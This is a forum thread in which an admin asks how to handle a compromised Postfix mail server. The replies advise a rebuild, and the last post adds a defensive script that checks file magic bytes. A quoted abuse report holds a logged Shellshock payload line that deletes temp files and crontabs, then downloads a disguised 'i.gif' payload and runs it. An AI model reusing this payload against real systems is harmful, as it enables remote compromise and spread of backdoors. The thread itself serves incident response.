EvilZone


: mail server attack
: dendic May 03, 2015, 08:31:16 AM
I received the following message. Could you explain my problem a little, and what can I do with my mail server (Postfix, Debian) to protect everything? (I have SpamAssassin on the mail server.)

From: chopper boy <choprboy@hotmail.com>
Date: 2015-04-29 9:55 GMT+02:00
Subject: Compromised server / Exploit attempts
To: "abuse@xxx.com"

Compromised server / Exploit attempts

Exploit attempts via bash variable push. Downloads bash script which
installs backdoor Trojan.Hacktool.Linux.Bf.E and starts additional exploit
scans against other servers.

Compromised server:
5.135.167.145
xxx.xxx.xxx.xxx (IP of my server)

Exploit bash scripts:
http://xxx.xxx.xxx.xxx/i.gif
http://xxx.xxx.xxx.xxx/nynew54.gif

Exploit scans address lists:
http://198.27.67.24/news/<xxx>
http://198.27.67.24/download/<xxx>

5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400
304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
/tmp/* ; rm -rf /var/tmp/* ; crontab -r ; killall -9 wget curl lwp-download
b f r xx y i.gif print start pscan pnscan ps ; wget
http://xxx.xxx.xxx.xxx/i.gif ; curl -O http://xxx.xxx.xxx.xxx/i.gif ; chmod +x
i.gif ; nohup ./i.gif &
\");'"

: Re: mail server attack
: proxx May 03, 2015, 09:47:52 AM
Please give more information about the situation; thus far it is not clear.
From the looks of it, from what I can tell, your server has been compromised and it is attacking other boxes.
Best bet is to set up another box, since it is very hard to tell if you have rootkits.
: Re: mail server attack
: dendic May 03, 2015, 02:59:42 PM

What kind of protection should I install, and how do I clean up my mail server?

From: Christopher Ravnborg <cr@rackhosting.com>
Date: 2015-04-29 10:34 GMT+02:00
Subject: xxx.xxx.xxx.xxx hosting malicious content
To: ivanxx@mydomain.net
Cc: "abuse@rackhosting.com" <abuse@rackhosting.com>

Hello,

xxx.xxx.xxx.xxx is hosting malicious content in form of bruteforce and/or DDoS tools.

http://xxx.xxx.xxx.xxx/i.gif shellcode
http://xxx.xxx.xxx.xxx/nynew54.gif tar archive.

Please handle this issue.

--
Best regards
Christopher Ravnborg
Rackhosting.com ApS
: Re: mail server attack
: proxx May 03, 2015, 03:08:55 PM
As I said, I suggest you just do a fresh install and keep auto-updates on.
Migrating the mail DB shouldn't be that hard.
: Re: mail server attack
: iTpHo3NiX May 03, 2015, 08:57:05 PM
Also remove those gifs, considering they're the malicious payload...
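An added check to go with that advice (my own example, not code from the thread or any poster): before deleting the ".gif" files the two abuse reports name, confirm from their leading bytes what they really are. A file served as .gif that begins with an ELF header, a `#!` shebang or a gzip signature is a dropped payload (the reports describe a shellcode binary and a tar archive), not an image, and that is worth recording in the incident notes before the wipe. The functions `file_kind`, `suspicious_gifs` and `make_sample_tree` are my own names; the web root and its files are constructed for the demo, with only the file names i.gif and nynew54.gif taken from the reports.

```shell
#!/bin/sh
# Added check, not code from the thread. Before deleting the ".gif" files the
# abuse reports name, confirm from their leading bytes what they really are:
# a file served as .gif that begins with an ELF header, a "#!" shebang or a
# gzip signature is a dropped payload, not an image. The sample web root and
# its files below are constructed for the demo; the names i.gif and
# nynew54.gif are taken from the reports.

# Print the kind of a file judged by its first four bytes (hex via od).
file_kind() {
    magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case $magic in
        7f454c46) echo elf ;;      # ELF executable (binary backdoor/scanner)
        2321*)    echo script ;;   # "#!" interpreter script (shell/perl dropper)
        1f8b*)    echo gzip ;;     # gzip stream, typically a .tar.gz tool bundle
        47494638) echo gif ;;      # "GIF8": a real GIF image
        *)        echo other ;;
    esac
}

# List every .gif under a directory whose content is not a GIF image,
# printing "path kind" so the finding can go into the incident notes.
suspicious_gifs() {
    find "$1" -type f -name '*.gif' | sort | while read -r f; do
        kind=$(file_kind "$f")
        [ "$kind" = gif ] || echo "$f $kind"
    done
}

# Build a constructed web root: one real image and three fake "gifs".
make_sample_tree() {
    printf 'GIF89a\001\000\001\000' > "$1/logo.gif"        # genuine image
    printf '\177ELF\002\001\001\000' > "$1/i.gif"           # ELF header
    printf '\037\213\010\000payload' > "$1/nynew54.gif"     # gzip header
    printf '#!/bin/sh\necho dropper\n' > "$1/dl.gif"        # shell script
}

# Demo: expect i.gif, nynew54.gif and dl.gif to be flagged, logo.gif not.
demo() {
    root=$(mktemp -d)
    make_sample_tree "$root"
    suspicious_gifs "$root"
    rm -rf "$root"
}
demo
```

On the real box, run `suspicious_gifs /var/www` (path is an assumption) and also point `file_kind` at anything left in /tmp and /var/tmp, since the logged command changes into those directories before fetching. Keep copies of the flagged files off the host for the abuse replies, then follow the advice above and rebuild rather than trust the cleaned system.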